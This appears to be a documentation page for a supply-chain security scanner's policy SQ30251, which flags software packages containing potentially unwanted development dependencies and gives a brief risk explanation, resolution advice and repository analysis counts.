SQ30251
Detected presence of software components developed using potentially unwanted dependencies.
| priority | CI/CD status | severity | effort | SAFE level | SAFE assessment |
|---|---|---|---|---|---|
 | pass | medium | high | None | malware: warning Reason: undesirable develop dependencies |
About the issueโ
Potentially unwanted applications (PUAs) can be considered a risk by some software users. This threat type typically collects private user data, or in more extreme cases, tampers with system security settings. Development dependencies may be optional, and could be installed or downloaded only if a certain pre-defined condition is met. Development dependencies are used by software developers during application production. Presence of potentially unwanted development dependencies could be an indication of a software build pipeline compromise. When software dependencies are confirmed to be found within the software package, additional issues might also be reported. Most threat prevention solutions detect and block PUAs. Software packages that trigger security solution detections also tend to increase the number of support calls and open tickets from users.
How to resolve the issueโ
- Revise the use of components that raise these alarms. If you can't deprecate those components, make sure they are well-documented.
Incidence statisticsโ
ReversingLabs periodically collects and analyzes the contents of popular software package repositories for threat research purposes. Analysis results are used to calculate incidence statistics for issues (policy violations) that Spectra Assure can detect in software packages.
This section is updated when new data becomes available.
Total amount of packages analyzed
- RubyGems: 203K
- Nuget: 735K
- PyPi: 838K
- NPM: 5.12M
- VS Code: 113K
- PS Gallery: 17K
Recommended readingโ
- What is a PUP? (External resource - Kaspersky)